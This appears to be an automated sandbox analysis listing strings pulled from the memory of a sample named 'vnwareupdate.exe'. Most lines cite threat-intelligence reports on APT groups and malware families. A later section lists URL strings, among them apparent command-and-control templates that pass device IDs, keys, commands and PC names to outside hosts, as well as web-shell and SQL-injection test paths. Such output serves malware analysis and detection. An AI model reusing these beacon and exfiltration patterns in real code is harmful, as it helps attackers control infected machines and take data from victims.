Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: DEF52F017EAAC4843AAB506A39AC2DBF96AEE5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E20B4E7A561F0AC5C6C515975B70A5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E2679CD208E0A421ADC4940662C583;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E29D1F5D79CD906F75C88177C7F6168E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E2A6AC540643E2428976B778C43D39;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E90308FF107CE38089DFF16A929431;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: E9A906082DF6383AA8D5DE60F6EF830E;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: E9FC007CC082BE545DBC0C62247ADE;Gendwnurl Backdoor https://twitter.com/0x766c6164/status/794176576011309056 / https://www.microsoft equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: EFDEF52F017EAAC4843AAB506A39AC2DBF96AEE5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F0AC82CCC4A6DEF48D5F9079B7C146126C6464;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F2943F5E45BEFA52FB12748CA7171D30096E1D4FC3C365561497C618341299D5;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F4DC8A2EBFD5EEA11A38877BD4F2DF;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F69EB2CF9F30EA96961C86B4347282;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F823EEEE02967B49B764E22319C79F;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: F9B72A2802D2A7FF33FD2D4BBCF41188724FCAA8;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.237651120.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: FCC093A79FAE9B92E69C99BB28F9AE12939E4E1327A371EEAC9207E346ECCDB4;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000003.245956038.0000000003927000.00000004.00000001.sdmp	String found in binary or memory: FCC51F70B2213BCE4D39DE56646795FD62D169;Advanced Persistent Threat Activity Targeting Energy and Other Critical Infrastructure Sectors https://www.us-cert.gov/ncas/alerts/TA17-293A / https://twitter.com/cyb3rops/sta equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000014.00000003.479045359.00000000036D7000.00000004.00000001.sdmp	String found in binary or memory: Karagany.B https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234Karagany.B https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234Karagany.B https://www.symantec.com/security_response/writeup.jsp?docid=2017-073103-3836-99New SamSam Ransomware samples https://twitter.com/demonslay335/status/876940273212895234Ding! Your RAT has been delivered http://blogs.cisco.com/security/talos/darkkomet-rat-spamMalicious Word document targeting Mac users https://objective-see.com/blog/blog_0x17.htmlFinding Hackingteam code in Russian malware https://objective-see.com/blog/blog_0x18.htmlDing! Your RAT has been delivered http://blogs.cisco.com/security/talos/darkkomet-rat-spamCOOLREAPER https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pDing! Your RAT has been delivered http://blogs.cisco.com/security/talos/darkkomet-rat-spamCOOLREAPER https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pDing! Your RAT has been delivered http://blogs.cisco.com/security/talos/darkkomet-rat-spamCOOLREAPER https://www.paloaltonetworks.com/content/dam/paloaltonetworks-com/en_US/assets/pOcean Lotus Report by Tencent https://s.tencent.com/research/report/471.html (HttpProv.dll)Ocean Lotus Report by Tencent https://s.tencent.com/research/report/471.html (HttpProv.dll) equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.539291516.0000000003621000.00000004.00000001.sdmp	String found in binary or memory: Lazarus Samples https://twitter.com/cyb3rops/status/945588042080899072Lazarus Samples https://twitter.com/cyb3rops/status/945588042080899072Lazarus Samples https://twitter.com/cyb3rops/status/945588042080899072Lazarus Samples https://twitter.com/cyb3rops/status/945588042080899072Lazarus Samples https://twitter.com/cyb3rops/status/945588042080899072Further Gaza Cybergang Activity http://www.freebuf.com/vuls/142970.htmlFurther Gaza Cybergang Activity http://www.freebuf.com/vuls/142970.htmlFurther Gaza Cybergang Activity http://www.freebuf.com/vuls/142970.htmlFurther Gaza Cybergang Activity http://www.freebuf.com/vuls/142970.htmlVENOM Linux rootkit https://security.web.cern.ch/security/venom.shtmllVENOM Linux rootkit https://security.web.cern.ch/security/venom.shtmlFurther Gaza Cybergang Activity http://www.freebuf.com/vuls/142970.htmlPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comEvilBunny (2014) https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57Pincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comEvilBunny (2014) https://app.box.com/s/xvilsesi5qd2gh6so2g3tnric51ndv57Pincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.comAPTnotes 2012 Cyberattack_against_Israeli_and_Palestinian_targets.pdfPincav Malware Hashes https://map.blueliv.com / https://www.blueliv.com equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.553151421.0000000003DE1000.00000004.00000001.sdmp	String found in binary or memory: Linux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pLinux/Moose http://www.welivesecurity.com/wp-content/uploads/2015/05/Dissecting-LinuxMoose.pMalicious Macros targetting South Korea https://twitter.com/eyalsela/status/900248754091167744Hellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsinHellsing APT https://securelist.com/analysis/publications/69567/the-chronicles-of-the-hellsin.p equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: Malware Analysis Report (MAR-10135536-G) \u2013 North Korean Trojan: BADCALL MAR-10135536-G_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publEvasive Malware Campaign Abuses Free Cloud Service, Targets Korean Speakers https://blog.fortinet.com/2017/09/20/evasive-malware-campaign-abuses-free-cloud-Malware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publMalware Analysis Report (MAR-10135536-F) \u2013 North Korean Trojan: HARDRAIN MAR-10135536-F_WHITE_stix.xml / https://www.us-cert.gov/sites/default/files/publDownloaders on Google Play spreading malware to steal Facebook login details https://blog.avast.com/downloaders-on-google-play-spreading-malware-to-steal-facDownloaders on Google Play spreading malware to steal Facebook login details https://blog.avast.com/downloaders-on-google-play-spreading-malware-to-steal-fac6B6E023B4221BAE8ED37BB18407516; APT10 / Cloud Hopper https://goo.gl/CywXnS equals www.facebook.com (Facebook)
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: New Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNaoinstalad Malware Targeting users in Brazil http://www.malware-traffic-analysis.net/2017/06/08/index.htmlNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNaoinstalad Malware Targeting users in Brazil http://www.malware-traffic-analysis.net/2017/06/08/index.htmlBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eya equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.527918576.0000000002831000.00000004.00000001.sdmp	String found in binary or memory: SDarkhotel (2014) https://cdn.securelist.com/files/2014/11/darkhotelappendixindicators_kl.pdf / htOperation Double Tap https://www.fireeye.com/blog/threat-research/2014/11/operation_doubletap.htmlAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spywareAPT Malware Delivered over Facebook https://blog.avast.com/avast-tracks-down-tempting-cedar-spyware equals www.facebook.com (Facebook)
Source: vnwareupdate.exe, 00000003.00000002.530463485.0000000002B4E000.00000004.00000001.sdmp	String found in binary or memory: Sowbug: Cyber espionage group targets South American and Southeast Asian governments https://www.symantec.com/connect/blogs/sowbug-cyber-espionage-group-targets-sout5Turla APT actor refreshes KopiLuwak JavaScript backdoor for use in G20-themed attack https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopi1#ISMDoor impersonates ZAHRANI (an electrical equipment and engineering company in Saudi Arabia) and ThetaRay. https://twitter.com/eyalsela/status/92066117900924109328cTurla APT actor refreshes KopiLuwak JavaScript backdoor for use in G20-themed attack https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopib8Turla APT actor refreshes KopiLuwak JavaScript backdoor for use in G20-themed attack https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopieTurla APT actor refreshes KopiLuwak JavaScript backdoor for use in G20-themed attack https://www.proofpoint.com/us/threat-insight/post/turla-apt-actor-refreshes-kopiNRecent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-aRecent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-udiRecent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-ioRecent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-Recent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks-f6Recent Watering Hole Attacks Attributed to APT Group th3bug Using Poison Ivy (2014) http://researchcenter.paloaltonetworks.com/2014/09/recent-watering-hole-attacks- equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.528939253.000000000297B000.00000004.00000001.sdmp	String found in binary or memory: The Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScThe Scarab attack group http://www.symantec.com/content/en/us/enterprise/media/security_response/docs/ScRATs from the Underground http://researchcenter.paloaltonetworks.com/2017/01/unit42-exploring-cybercrime-uBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyaBanking Trojan Attempts To Steal Brazillion$ http://blog.talosintelligence.com/2017/09/brazilbanking.htmlNew Arid Viper Activity https://twitter.com/eyalsela/status/882497460102365185 / https://twitter.com/eyad312ff06187c93d12dd5f1d0;FannyWorm Equation Group Sample http://goo.gl/f6xNwu equals www.twitter.com (Twitter)
Source: vnwareupdate.exe, 00000003.00000002.538970312.00000000035E1000.00000004.00000001.sdmp	String found in binary or memory: The Spring Dragon APT https://securelist.com/blog/research/70726/the-spring-dragon-apt/APT1: technical backstage (2013) https://app.box.com/s/x2jgr4j1bgfas2h2b4h09mam9nn4qwu3Group5: Syria and the Iranian Connection https://citizenlab.org/2016/08/group5-syria/APT29 Domain Fronting With TOR https://www.fireeye.com/blog/threat-research/2017/03/APT29 Domain Fronting With TOR https://www.fireeye.com/blog/threat-research/2017/03/APT29 Domain Fronting With TOR https://www.fireeye.com/blog/threat-research/2017/03/APT29 Domain Fronting With TOR https://www.fireeye.com/blog/threat-research/2017/03//Nebula Exploit Kit http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlNebula Exploit Kit http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlNebula Exploit Kit http://malware.dontneedcoffee.com/2017/03/nebula-exploit-kit.htmlUrsnif: Deep Technical Dive http://www.seculert.com/blogs/ursnif-deep-technical-diveLazarus Bitcoin Spearphishes https://twitter.com/ClearskySec/status/944926250161844224Group5: Syria and the Iranian Connection https://citizenlab.org/2016/08/group5-syria/Lazarus Bitcoin Spearphishes https://twitter.com/ClearskySec/status/944926250161844224Group5: Syria and the Iranian Connection https://citizenlab.org/2016/08/group5-syria/Group5: Syria and the Iranian Connection https://citizenlab.org/2016/08/group5-syria/Angler Exploit Kit New Variants http://blogs.cisco.com/security/talos/angler-variantsAngler Exploit Kit New Variants http://blogs.cisco.com/security/talos/angler-variantsGroup5: Syria and the Iranian Connection https://citizenlab.org/2016/08/group5-syria/Lazarus Bitcoin Spearphishes https://twitter.com/ClearskySec/status/944926250161844224Angler Exploit Kit New Variants http://blogs.cisco.com/security/talos/angler-variantsAngler Exploit Kit New Variants http://blogs.cisco.com/security/talos/angler-variants equals www.twitter.com (Twitter)

Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: HTTP://HI.BAIDU.COM/0X24Q
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: Http://Www.YrYz.Net
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: Http://www.darkst.com
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/%5.5d.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/content.html?id=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/device_command.asp?device_id=%s&cv=%s&command=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/error.html?tab=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/ja-JP/2015/%d/%d/%d%d%d%d%d%d%d%d.gif
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/logo.png
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/main.php?ssid=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/provide?clients=%s&reqs=visit.startload
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/record.asp?device_t=%s&key=%s&device_id=%s&cv=%s&result=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/result_%s.htm
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s/webmail.php?id=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/aspxabcdef.asp?%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%s:%d/aspxabcdefg.asp?%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://%ws:%d/%d%s%dHTTP/1.1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://0.0.0.0/1
Source: vnwareupdate.exe, 00000003.00000003.233349750.0000000006273000.00000004.00000001.sdmp	String found in binary or memory: http://0xicf.wordpress.com/2014/12/18/a-pirated-version-of-the-assassins-creed-a
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://124.133.254.171/up/up.asp?id=%08x&pcname=%s
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/1.exe
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/6kbbs/bank.asp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/cookie.asp?fuck=
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/error1.asp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/phptunnel.php
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1/sql.asp?id=1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:%d/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:%u/
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:8000/$_name
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://192.168.16.186/details.php?id=1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://192.169.200.200:2217/mysql_inject.php?id=1
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://2016.eicar.org/85-0-Download.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://202.113.20.235/gj/images/2.asp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://210.73.64.88/doorway/cgi-bin/getclientip.asp?IP=
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://24hack.com/xyadmin.asp
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://Www.cnhuker.com
Source: vnwareupdate.exe, 00000003.00000003.236259168.0000000005C73000.00000004.00000001.sdmp	String found in binary or memory: http://amtrckr.info/json/live
Source: vnwareupdate.exe, 00000003.00000002.544656700.0000000003747000.00000004.00000001.sdmp	String found in binary or memory: http://amtrckr.info/json/liveeFull
Source: vnwareupdate.exe, 00000003.00000003.241595025.0000000005951000.00000004.00000001.sdmp	String found in binary or memory: http://asec.ahnlab.com/1015
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://babelfish.yahoo.com/translate_url?
Source: vnwareupdate.exe, 00000003.00000003.245681490.0000000003AE7000.00000004.00000001.sdmp	String found in binary or memory: http://baesystemsai.blogspot.co.uk/2017/10/taiwan-heist-lazarus-tools.html
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://baesystemsai.blogspot.co.uk/2017/10/taiwan-heist-lazarus-tools.htmlFake
Source: vnwareupdate.exe, 00000003.00000003.234581767.0000000006173000.00000004.00000001.sdmp	String found in binary or memory: http://baesystemsai.blogspot.co.uk/2017/10/taiwan-heist-lazarus-tools.htmlTaiwan
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://baesystemsai.blogspot.com/2016/04/two-bytes-to-951m.html
Source: vnwareupdate.exe, 00000003.00000003.270488025.00000000063E0000.00000004.00000001.sdmp	String found in binary or memory: http://bbs.yesmybi.net
Source: vnwareupdate.exe, 00000003.00000003.233308423.0000000006233000.00000004.00000001.sdmp, vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://benkowlab.blogspot.com/2017/08/a-third-look-in-jsdropperursnif.html?m=1/.
Source: vnwareupdate.exe, 0000000A.00000003.287952784.00000000060E3000.00000004.00000001.sdmp	String found in binary or memory: http://benkowlab.blogspot.com/2017/08/a-third-look-in-jsdropperursnif.html?m=1/A
Source: vnwareupdate.exe, 00000003.00000003.234668873.00000000061F3000.00000004.00000001.sdmp	String found in binary or memory: http://benkowlab.blogspot.com/2017/08/a-third-look-in-jsdropperursnif.html?m=1/The
